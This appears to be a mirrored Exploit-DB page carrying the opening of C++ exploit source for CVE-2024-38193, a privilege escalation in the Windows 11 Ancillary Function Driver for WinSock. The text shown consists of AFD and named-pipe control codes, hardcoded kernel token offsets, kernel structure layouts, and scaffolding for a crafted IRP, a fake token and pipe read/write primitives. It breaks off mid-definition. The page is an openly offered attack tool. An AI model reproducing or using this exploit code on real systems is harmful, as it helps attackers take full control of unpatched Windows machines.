Microsoft Windows 11 Pro 23H2 – Ancillary Function Driver for WinSock Privilege Escalation

• Exploit Database
• 5 阅读

• 作者： Milad karimi
  日期： 2025-05-09
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/52284/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493 494 495 496 497 498 499 500 501 502 503 504 505 506 507 508 509 510 511 512 513 514 515 516 517 518 519 520 521 522 523 524 525 526 527 528 529 530 531 532 533 534 535 536 537 538 539 540 541 542 543 544 545 546 547 548 549 550 551 552 553 554 555 556 557 558 559 560 561 562 563 564 565 566 567 568 569 570 571 572 573 574 575 576 577 578 579 580 581 582 583 584 585 586 587 588 589 590 591 592 593 594 595 596 597 598 599 600 601 602 603 604 605 606 607 608 609 610 611 612 613 614 615 616 617 618 619 620 621 622 623 624 625 626 627 628 629 630 631 632 633 634 635 636 637 638 639 640 641 642 643 644 645 646 647 648 649 650 651 652 653 654 655 656 657 658 659 660 661 662 663 664 665 666 667 668 669 670 671 672 673 674 675 676 677 678 679 680 681 682 683 684 685 686 687 688 689 690 691 692 693 694 695 696 697 698 699 700 701 702 703 704 705 706 707 708 709 710 711 712 713 714 715 716 717 718 719 720 721 722 723 724 725 726 727 728 729 730 731 732 733 734 735 736 737 738 739 740 741 742 743 744 745 746 747 748 749 750 751 752 753 754 755 756 757 758 759 760 761 762 763 764 765 766 767 768 769 770 771 772 773 774 775 776 777 778 779 780 781 782 783 784 785 786 787 788 789 790 791 792 793 794 795 796 797 798 799 800 801 802 803 804 805 806 807 808 809 810 811 812 813 814 815 816 817 818 819 820 821 822 823 824 825 826 827 828 829 830 831 832 833 834 835 836 837 838 839 840 841 842 843 844 845 846 847 848 849 850 851 852 853 854 855 856 857 858 859 860 861 862 863 864 865 866 867 868 869 870 871 872 873 874 875 876 877 878 879 880 881 882 883 884

  # Exploit Title: Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation # Date: 2025-05-05 # Exploit Author: Milad Karimi (Ex3ptionaL) # Contact: miladgrayhat@gmail.com # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # Tested on: Win x64 # CVE : CVE-2024-38193   #pragma once   #include "ntstatus.h" #include "Windows.h" #include <iostream>   #pragma comment(lib, "ntdll.lib")     #define HIDWORD(l) ((DWORD)(((DWORDLONG)(l)>>32)&0xFFFFFFFF)) #define LODWORD(l) ((DWORD)((DWORDLONG)(l)))   #define AfdOpenPacket "AfdOpenPacketXX" #define AFD_DEVICE_NAME L"\\Device\\Afd" #define LOCALHOST "127.0.0.1"     #define IOCTL_AFD_BIND 0x12003LL #define IOCTL_AFD_LISTEN 0x1200BLL #define IOCTL_AFD_CONNECT 0x120BBLL #define IOCTL_AFD_GET_SOCK_NAME 0x1202FLL #define FSCTL_PIPE_PEEK 0x11400CLL #define FSCTL_PIPE_IMPERSONATE 0x11001CLL #define FSCTL_PIPE_INTERNAL_WRITE 0x119FF8   #define OBJ_CASE_INSENSITIVE 0x00000040 #define OBJ_INHERIT 0x00000002 #define FILE_OPEN_IF 0x3 #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)   #define OFFSET_IN_TOKEN_VARIABLEPART 0x490 #define OFFSET_IN_TOKEN_TOKEN_PRIVILEGES 0x40 #define OFFSET_IN_TOKEN_PRIMARY_GROUP 0xA8 #define OFFSET_IN_TOKEN_DYNAMIC_PART 0xB0 #define OFFSET_IN_TOKEN_DEFAULT_DACL 0xB8 #define PREVIOUS_MODE_OFFSET 0x232 #define OFFSET_TO_ACTIVE_PROCESS_LINKS 0x448 #define OFFSET_TO_TOKEN 0x4b8 #define CURRENT_THREAD (HANDLE)0xFFFFFFFFFFFFFFFE     typedef struct IO_STATUS_BLOCK { union { DWORD Status; PVOID Pointer; };   DWORD* Information; };   //0x4 bytes (sizeof) struct _SYSTEM_POWER_STATE_CONTEXT { union { struct { ULONG Reserved1 : 8; //0x0 ULONG TargetSystemState : 4; //0x0 ULONG EffectiveSystemState : 4; //0x0 ULONG CurrentSystemState : 4; //0x0 ULONG IgnoreHibernationPath : 1; //0x0 ULONG PseudoTransition : 1; //0x0 ULONG KernelSoftReboot : 1; //0x0 ULONG DirectedDripsTransition : 1; //0x0 ULONG Reserved2 : 8; //0x0 }; ULONG ContextAsUlong; //0x0 }; };   //0x4 bytes (sizeof) union _POWER_STATE { enum _SYSTEM_POWER_STATE SystemState; //0x0 enum _DEVICE_POWER_STATE DeviceState; //0x0 };   //0x48 bytes (sizeof) typedef struct _IO_STACK_LOCATION { UCHAR MajorFunction; //0x0 UCHAR MinorFunction; //0x1 UCHAR Flags; //0x2 UCHAR Control; //0x3 union { struct { struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8 ULONG Options; //0x10 USHORT FileAttributes; //0x18 USHORT ShareAccess; //0x1a ULONG EaLength; //0x20 } Create; //0x8 struct { struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8 ULONG Options; //0x10 USHORT Reserved; //0x18 USHORT ShareAccess; //0x1a struct _NAMED_PIPE_CREATE_PARAMETERS* Parameters; //0x20 } CreatePipe; //0x8 struct { struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8 ULONG Options; //0x10 USHORT Reserved; //0x18 USHORT ShareAccess; //0x1a struct _MAILSLOT_CREATE_PARAMETERS* Parameters; //0x20 } CreateMailslot; //0x8 struct { ULONG Length; //0x8 ULONG Key; //0x10 ULONG Flags; //0x14 union _LARGE_INTEGER ByteOffset; //0x18 } Read; //0x8 struct { ULONG Length; //0x8 ULONG Key; //0x10 ULONG Flags; //0x14 union _LARGE_INTEGER ByteOffset; //0x18 } Write; //0x8 struct { ULONG Length; //0x8 struct _UNICODE_STRING* FileName; //0x10 enum _FILE_INFORMATION_CLASS FileInformationClass; //0x18 ULONG FileIndex; //0x20 } QueryDirectory; //0x8 struct { ULONG Length; //0x8 ULONG CompletionFilter; //0x10 } NotifyDirectory; //0x8 struct { ULONG Length; //0x8 ULONG CompletionFilter; //0x10 enum _DIRECTORY_NOTIFY_INFORMATION_CLASS DirectoryNotifyInformationClass; //0x18 } NotifyDirectoryEx; //0x8 struct { ULONG Length; //0x8 enum _FILE_INFORMATION_CLASS FileInformationClass; //0x10 } QueryFile; //0x8 struct { ULONG Length; //0x8 enum _FILE_INFORMATION_CLASS FileInformationClass; //0x10 struct _FILE_OBJECT* FileObject; //0x18 union { struct { UCHAR ReplaceIfExists; //0x20 UCHAR AdvanceOnly; //0x21 }; ULONG ClusterCount; //0x20 VOID* DeleteHandle; //0x20 }; } SetFile; //0x8 struct { ULONG Length; //0x8 VOID* EaList; //0x10 ULONG EaListLength; //0x18 ULONG EaIndex; //0x20 } QueryEa; //0x8 struct { ULONG Length; //0x8 } SetEa; //0x8 struct { ULONG Length; //0x8 enum _FSINFOCLASS FsInformationClass; //0x10 } QueryVolume; //0x8 struct { ULONG Length; //0x8 enum _FSINFOCLASS FsInformationClass; //0x10 } SetVolume; //0x8 struct { ULONG OutputBufferLength; //0x8 ULONG InputBufferLength; //0x10 ULONG FsControlCode; //0x18 VOID* Type3InputBuffer; //0x20 } FileSystemControl; //0x8 struct { union _LARGE_INTEGER* Length; //0x8 ULONG Key; //0x10 union _LARGE_INTEGER ByteOffset; //0x18 } LockControl; //0x8 struct { ULONG OutputBufferLength; //0x8 ULONG InputBufferLength; //0x10 ULONG IoControlCode; //0x18 VOID* Type3InputBuffer; //0x20 } DeviceIoControl; //0x8 struct { ULONG SecurityInformation; //0x8 ULONG Length; //0x10 } QuerySecurity; //0x8 struct { ULONG SecurityInformation; //0x8 VOID* SecurityDescriptor; //0x10 } SetSecurity; //0x8 struct { struct _VPB* Vpb; //0x8 struct _DEVICE_OBJECT* DeviceObject; //0x10 } MountVolume; //0x8 struct { struct _VPB* Vpb; //0x8 struct _DEVICE_OBJECT* DeviceObject; //0x10 } VerifyVolume; //0x8 struct { struct _SCSI_REQUEST_BLOCK* Srb; //0x8 } Scsi; //0x8 struct { ULONG Length; //0x8 VOID* StartSid; //0x10 struct _FILE_GET_QUOTA_INFORMATION* SidList; //0x18 ULONG SidListLength; //0x20 } QueryQuota; //0x8 struct { ULONG Length; //0x8 } SetQuota; //0x8 struct { enum _DEVICE_RELATION_TYPE Type; //0x8 } QueryDeviceRelations; //0x8 struct { struct _GUID* InterfaceType; //0x8 USHORT Size; //0x10 USHORT Version; //0x12 struct _INTERFACE* Interface; //0x18 VOID* InterfaceSpecificData; //0x20 } QueryInterface; //0x8 struct { struct _DEVICE_CAPABILITIES* Capabilities; //0x8 } DeviceCapabilities; //0x8 struct { struct _IO_RESOURCE_REQUIREMENTS_LIST* IoResourceRequirementList; //0x8 } FilterResourceRequirements; //0x8 struct { ULONG WhichSpace; //0x8 VOID* Buffer; //0x10 ULONG Offset; //0x18 ULONG Length; //0x20 } ReadWriteConfig; //0x8 struct { UCHAR Lock; //0x8 } SetLock; //0x8 struct { enum BUS_QUERY_ID_TYPE IdType; //0x8 } QueryId; //0x8 struct { enum DEVICE_TEXT_TYPE DeviceTextType; //0x8 ULONG LocaleId; //0x10 } QueryDeviceText; //0x8 struct { UCHAR InPath; //0x8 UCHAR Reserved[3]; //0x9 enum _DEVICE_USAGE_NOTIFICATION_TYPE Type; //0x10 } UsageNotification; //0x8 struct { enum _SYSTEM_POWER_STATE PowerState; //0x8 } WaitWake; //0x8 struct { struct _POWER_SEQUENCE* PowerSequence; //0x8 } PowerSequence; //0x8 struct { union { ULONG SystemContext; //0x8 struct _SYSTEM_POWER_STATE_CONTEXT SystemPowerStateContext; //0x8 }; enum _POWER_STATE_TYPE Type; //0x10 union _POWER_STATE State; //0x18 enum POWER_ACTION ShutdownType; //0x20 } Power; //0x8 struct { struct _CM_RESOURCE_LIST* AllocatedResources; //0x8 struct _CM_RESOURCE_LIST* AllocatedResourcesTranslated; //0x10 } StartDevice; //0x8 struct { ULONGLONG ProviderId; //0x8 VOID* DataPath; //0x10 ULONG BufferSize; //0x18 VOID* Buffer; //0x20 } WMI; //0x8 struct { VOID* Argument1; //0x8 VOID* Argument2; //0x10 VOID* Argument3; //0x18 VOID* Argument4; //0x20 } Others; //0x8 } Parameters; //0x8 struct _DEVICE_OBJECT* DeviceObject; //0x28 struct _FILE_OBJECT* FileObject; //0x30 LONG(*CompletionRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP* arg2, VOID* arg3); //0x38 VOID* Context; //0x40 }IO_STACK_LOCATION;   //0x18 bytes (sizeof) struct _KDEVICE_QUEUE_ENTRY { struct _LIST_ENTRY DeviceListEntry; //0x0 ULONG SortKey; //0x10 UCHAR Inserted; //0x14 };   //0x58 bytes (sizeof) struct _KAPC { UCHAR Type; //0x0 UCHAR AllFlags; //0x1 UCHAR Size; //0x2 UCHAR SpareByte1; //0x3 ULONG SpareLong0; //0x4 struct _KTHREAD* Thread; //0x8 struct _LIST_ENTRY ApcListEntry; //0x10 VOID* Reserved[3]; //0x20 VOID* NormalContext; //0x38 VOID* SystemArgument1; //0x40 VOID* SystemArgument2; //0x48 CHAR ApcStateIndex; //0x50 CHAR ApcMode; //0x51 UCHAR Inserted; //0x52 }; //0xd0 bytes (sizeof) struct _IRP { SHORT Type; //0x0 USHORT Size; //0x2 USHORT AllocationProcessorNumber; //0x4 USHORT Reserved; //0x6 struct _MDL* MdlAddress; //0x8 ULONG Flags; //0x10 union { struct _IRP* MasterIrp; //0x18 LONG IrpCount; //0x18 VOID* SystemBuffer; //0x18 } AssociatedIrp; //0x18 struct _LIST_ENTRY ThreadListEntry; //0x20 struct IO_STATUS_BLOCK IoStatus; //0x30 CHAR RequestorMode; //0x40 UCHAR PendingReturned; //0x41 CHAR StackCount; //0x42 CHAR CurrentLocation; //0x43 UCHAR Cancel; //0x44 UCHAR CancelIrql; //0x45 CHAR ApcEnvironment; //0x46 UCHAR AllocationFlags; //0x47 union { struct _IO_STATUS_BLOCK* UserIosb; //0x48 VOID* IoRingContext; //0x48 }; struct _KEVENT* UserEvent; //0x50 union { struct { union { VOID(*UserApcRoutine)(VOID* arg1, struct _IO_STATUS_BLOCK* arg2, ULONG arg3); //0x58 VOID* IssuingProcess; //0x58 }; union { VOID* UserApcContext; //0x60 struct _IORING_OBJECT* IoRing; //0x60 }; } AsynchronousParameters; //0x58 union _LARGE_INTEGER AllocationSize; //0x58 } Overlay; //0x58 VOID(*CancelRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP* arg2); //0x68 VOID* UserBuffer; //0x70 union { struct { union { struct _KDEVICE_QUEUE_ENTRY DeviceQueueEntry; //0x78 VOID* DriverContext[4]; //0x78 }; struct _ETHREAD* Thread; //0x98 CHAR* AuxiliaryBuffer; //0xa0 struct _LIST_ENTRY ListEntry; //0xa8 union { struct _IO_STACK_LOCATION* CurrentStackLocation; //0xb8 ULONG PacketType; //0xb8 }; struct _FILE_OBJECT* OriginalFileObject; //0xc0 VOID* IrpExtension; //0xc8 } Overlay; //0x78 struct _KAPC Apc; //0x78 VOID* CompletionKey; //0x78 } Tail; //0x78 }; typedef struct _TA_ADDRESS { USHORT AddressLength; USHORT AddressType; UCHAR Address[1]; }TA_ADDRESS;   typedef struct _TRANSPORT_ADDRESS { LONG TAAddressCount; TA_ADDRESS Address[1]; }TRANSPORT_ADDRESS;   typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING, * PUNICODE_STRING;   typedef struct _OBJECT_ATTRIBUTES { ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService; }OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;   typedef struct _SYSTEM_MODULE_ENTRY { HANDLE Section; PVOID MappedBase; PVOID ImageBase; ULONG ImageSize; ULONG Flags; USHORT LoadOrderIndex; USHORT InitOrderIndex; USHORT LoadCount; USHORT OffsetToFileName; UCHAR FullPathName[256]; } SYSTEM_MODULE_ENTRY, * PSYSTEM_MODULE_ENTRY;   typedef struct _SYSTEM_MODULE_INFORMATION { ULONG Count; SYSTEM_MODULE_ENTRY Module[1]; } SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;   typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX { PVOID Object; ULONG_PTR UniqueProcessId; ULONG_PTR HandleValue; ULONG GrantedAccess; USHORT CreatorBackTraceIndex; USHORT ObjectTypeIndex; ULONG HandleAttributes; ULONG Reserved; } SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;   typedef struct _SYSTEM_HANDLE_INFORMATION_EX { ULONG_PTR NumberOfHandles; ULONG_PTR Reserved; SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1]; } SYSTEM_HANDLE_INFORMATION_EX, * PSYSTEM_HANDLE_INFORMATION_EX;   typedef struct _AFD_CREATE_PACKET { //FILE_FULL_EA_INFORMATION ULONG NextEntryOffset; WORD Flags; UCHAR EaNameLength; USHORT EaValueLength; CHAR EaName[15];   //AFD_CREATE_PACKET ULONG EndpointFlags; ULONG GroupID; ULONG AddressFamily; ULONG SocketType; ULONG Protocol; ULONG SizeOfTransportName; wchar_t TransportName[16]; //UCHAR Unkown; } AFD_CREATE_PACKET;   enum THREADINFOCLASS { ThreadImpersonationToken = 5 };   enum SYSTEM_INFORMATION_CLASS { SystemModuleInformation = 11, SystemExtendedHandleInformation = 64 };   typedef enum EVENT_TYPE { NotificationEvent, SynchronizationEvent };   typedef struct _AFD_BIND_DATA { ULONG ShareType; SOCKADDR_IN addr; } AFD_BIND_DATA, * PAFD_BIND_DATA;   typedef struct alignas(16) MY_AFD_CONNECT_INFO { __int64 UseSan; __int64 hNtSock1; __int64 Unknown; __int32 tmp6; WORD const_16; sockaddr_in bind; };     typedef struct FAKE_DATA_ENTRY_QUEUE { DWORD tmp; LIST_ENTRY nextQueue; __int64 unknown; PVOID security_client_context; __int64 unknown2; __int64 sizeOfData; char DATA[0x77FD0]; };   typedef struct _AFD_LISTEN_INFO {   ULONG unknown; __int64 MaximumConnectionQueue; } AFD_LISTEN_INFO, * PAFD_LISTEN_INFO;             typedef struct _SECURITY_CLIENT_CONTEXT { _SECURITY_QUALITY_OF_SERVICE SecurityQos; void* ClientToken; unsigned __int8 DirectlyAccessClientToken; unsigned __int8 DirectAccessEffectiveOnly; unsigned __int8 ServerIsRemote; _TOKEN_CONTROL ClientTokenControl; }SECURITY_CLIENT_CONTEXT, * PSECURITY_CLIENT_CONTEXT;   struct __declspec(align(8)) _OWNER_ENTRY { unsigned __int64 OwnerThread; DWORD ___u1; };     //0x68 bytes (sizeof) typedef struct _ERESOURCE { struct _LIST_ENTRY SystemResourcesList; //0x0 struct _OWNER_ENTRY* OwnerTable; //0x10 SHORT ActiveCount; //0x18 union { USHORT Flag; //0x1a struct { UCHAR ReservedLowFlags; //0x1a UCHAR WaiterPriority; //0x1b }; }; VOID* SharedWaiters; //0x20 VOID* ExclusiveWaiters; //0x28 struct _OWNER_ENTRY OwnerEntry; //0x30 ULONG ActiveEntries; //0x40 ULONG ContentionCount; //0x44 ULONG NumberOfSharedWaiters; //0x48 ULONG NumberOfExclusiveWaiters; //0x4c VOID* Reserved2; //0x50 union { VOID* Address; //0x58 ULONGLONG CreatorBackTraceIndex; //0x58 }; ULONGLONG SpinLock; //0x60 }ERESOURCE, *PERESOURCE;   //0x8 bytes (sizeof) typedef struct _EX_PUSH_LOCK { union { struct { ULONGLONG Locked : 1; //0x0 ULONGLONG Waiting : 1; //0x0 ULONGLONG Waking : 1; //0x0 ULONGLONG MultipleShared : 1; //0x0 ULONGLONG Shared : 60; //0x0 }; ULONGLONG Value; //0x0 VOID* Ptr; //0x0 }; };   //0x10 bytes (sizeof) typedef struct _SEP_CACHED_HANDLES_TABLE { struct _EX_PUSH_LOCK Lock; //0x0 struct _RTL_DYNAMIC_HASH_TABLE* HashTable; //0x8 };   //0x8 bytes (sizeof) typedef struct _EX_RUNDOWN_REF { union { ULONGLONG Count; //0x0 VOID* Ptr; //0x0 }; };   //0x20 bytes (sizeof) typedef struct _OB_HANDLE_REVOCATION_BLOCK { struct _LIST_ENTRY RevocationInfos; //0x0 struct _EX_PUSH_LOCK Lock; //0x10 struct _EX_RUNDOWN_REF Rundown; //0x18 };   //0xc0 bytes (sizeof) typedef struct _SEP_LOGON_SESSION_REFERENCES { struct _SEP_LOGON_SESSION_REFERENCES* Next; //0x0 struct _LUID LogonId; //0x8 struct _LUID BuddyLogonId; //0x10 LONGLONG ReferenceCount; //0x18 ULONG Flags; //0x20 struct _DEVICE_MAP* pDeviceMap; //0x28 VOID* Token; //0x30 struct _UNICODE_STRING AccountName; //0x38 struct _UNICODE_STRING AuthorityName; //0x48 struct _SEP_CACHED_HANDLES_TABLE CachedHandlesTable; //0x58 struct _EX_PUSH_LOCK SharedDataLock; //0x68 struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* SharedClaimAttributes; //0x70 struct _SEP_SID_VALUES_BLOCK* SharedSidValues; //0x78 struct _OB_HANDLE_REVOCATION_BLOCK RevocationBlock; //0x80 struct _EJOB* ServerSilo; //0xa0 struct _LUID SiblingAuthId; //0xa8 struct _LIST_ENTRY TokenList; //0xb0 }; //0x30 bytes (sizeof) typedef struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION { ULONG SecurityAttributeCount; //0x0 struct _LIST_ENTRY SecurityAttributesList; //0x8 ULONG WorkingSecurityAttributeCount; //0x18 struct _LIST_ENTRY WorkingSecurityAttributesList; //0x20 }AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION;   //0x20 bytes (sizeof) typedef struct _SEP_SID_VALUES_BLOCK { ULONG BlockLength; //0x0 LONGLONG ReferenceCount; //0x8 ULONG SidCount; //0x10 ULONGLONG SidValuesStart; //0x18 }SEP_SID_VALUES_BLOCK,*PSEP_SID_VALUES_BLOCK;   //0x18 bytes (sizeof) struct _SEP_TOKEN_PRIVILEGES { ULONGLONG Present; //0x0 ULONGLONG Enabled; //0x8 ULONGLONG EnabledByDefault; //0x10 };   //0x1f bytes (sizeof) struct _SEP_AUDIT_POLICY { struct _TOKEN_AUDIT_POLICY AdtTokenPolicy; //0x0 UCHAR PolicySetStatus; //0x1e };   //0x498 bytes (sizeof) struct _TOKEN { struct _TOKEN_SOURCE TokenSource; //0x0 struct _LUID TokenId; //0x10 struct _LUID AuthenticationId; //0x18 struct _LUID ParentTokenId; //0x20 union _LARGE_INTEGER ExpirationTime; //0x28 struct _ERESOURCE* TokenLock; //0x30 struct _LUID ModifiedId; //0x38 struct _SEP_TOKEN_PRIVILEGES Privileges; //0x40 struct _SEP_AUDIT_POLICY AuditPolicy; //0x58 ULONG SessionId; //0x78 ULONG UserAndGroupCount; //0x7c ULONG RestrictedSidCount; //0x80 ULONG VariableLength; //0x84 ULONG DynamicCharged; //0x88 ULONG DynamicAvailable; //0x8c ULONG DefaultOwnerIndex; //0x90 struct _SID_AND_ATTRIBUTES* UserAndGroups; //0x98 struct _SID_AND_ATTRIBUTES* RestrictedSids; //0xa0 VOID* PrimaryGroup; //0xa8 ULONG* DynamicPart; //0xb0 struct _ACL* DefaultDacl; //0xb8 enum _TOKEN_TYPE TokenType; //0xc0 enum _SECURITY_IMPERSONATION_LEVEL ImpersonationLevel; //0xc4 ULONG TokenFlags; //0xc8 UCHAR TokenInUse; //0xcc ULONG IntegrityLevelIndex; //0xd0 ULONG MandatoryPolicy; //0xd4 void* LogonSession; //0xd8 struct _LUID OriginatingLogonSession; //0xe0 struct _SID_AND_ATTRIBUTES_HASH SidHash; //0xe8 struct _SID_AND_ATTRIBUTES_HASH RestrictedSidHash; //0x1f8 struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION* pSecurityAttributes; //0x308 VOID* Package; //0x310 struct _SID_AND_ATTRIBUTES* Capabilities; //0x318 ULONG CapabilityCount; //0x320 struct _SID_AND_ATTRIBUTES_HASH CapabilitiesHash; //0x328 struct _SEP_LOWBOX_NUMBER_ENTRY* LowboxNumberEntry; //0x438 struct _SEP_CACHED_HANDLES_ENTRY* LowboxHandlesEntry; //0x440 struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* pClaimAttributes; //0x448 VOID* TrustLevelSid; //0x450 struct _TOKEN* TrustLinkedToken; //0x458 VOID* IntegrityLevelSidValue; //0x460 struct _SEP_SID_VALUES_BLOCK* TokenSidValues; //0x468 struct _SEP_LUID_TO_INDEX_MAP_ENTRY* IndexEntry; //0x470 struct _SEP_TOKEN_DIAG_TRACK_ENTRY* DiagnosticInfo; //0x478 struct _SEP_CACHED_HANDLES_ENTRY* BnoIsolationHandlesEntry; //0x480 VOID* SessionObject; //0x488 ULONGLONG VariablePart; //0x490 };   //0x38 bytes (sizeof) struct _OBJECT_HEADER { LONGLONG PointerCount; //0x0 union { LONGLONG HandleCount; //0x8 VOID* NextToFree; //0x8 }; struct _EX_PUSH_LOCK Lock; //0x10 UCHAR TypeIndex; //0x18 union { UCHAR TraceFlags; //0x19 struct { UCHAR DbgRefTrace : 1; //0x19 UCHAR DbgTracePermanent : 1; //0x19 }; }; UCHAR InfoMask; //0x1a union { UCHAR Flags; //0x1b struct { UCHAR NewObject : 1; //0x1b UCHAR KernelObject : 1; //0x1b UCHAR KernelOnlyAccess : 1; //0x1b UCHAR ExclusiveObject : 1; //0x1b UCHAR PermanentObject : 1; //0x1b UCHAR DefaultSecurityQuota : 1; //0x1b UCHAR SingleHandleEntry : 1; //0x1b UCHAR DeletedInline : 1; //0x1b }; }; ULONG Reserved; //0x1c union { struct _OBJECT_CREATE_INFORMATION* ObjectCreateInfo; //0x20 VOID* QuotaBlockCharged; //0x20 }; VOID* SecurityDescriptor; //0x28 struct _TOKEN Body; //0x30 };   struct mm { void* fake_data_entry; void* input; _IRP* crafted_irp; IO_STACK_LOCATION *crafted_arbitrary_io_stack_location; void* p_mem_0x30; void* p_mem_0xD0_2; _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION* pSecurityAttributes; ACL* VariablePartDefaultDacl; ACL* VariablePartDefaultDacl2; _ERESOURCE* TokenLock; void* PrimaryGroup; int sizeOfClientTokenAndObjectHeader; PSEP_SID_VALUES_BLOCK TokenSidValues; _SECURITY_CLIENT_CONTEXT* security_client_context; _SEP_LOGON_SESSION_REFERENCES* LogonSession; _TOKEN* fakeToken; void *pipe_100_im_control_block; void* pipe_100_rw_control_block; void* p_mem_Pipe_hToPipe_1000_rw; void* p_mem_Pipe_hToPipe_1000_rw_2; HANDLE hPipeIM; HANDLE hPipeRW; HANDLE hFileIM; HANDLE hFileRW; HANDLE IncPrimitiveTOKEN; HANDLE RWPrimitiveTOKEN; };   //0x18 bytes (sizeof) struct _DISPATCHER_HEADER { union { volatile LONG Lock; //0x0 LONG LockNV; //0x0 struct { UCHAR Type; //0x0 UCHAR Signalling; //0x1 UCHAR Size; //0x2 UCHAR Reserved1; //0x3 }; struct { UCHAR TimerType; //0x0 union { UCHAR TimerControlFlags; //0x1 struct { UCHAR Absolute : 1;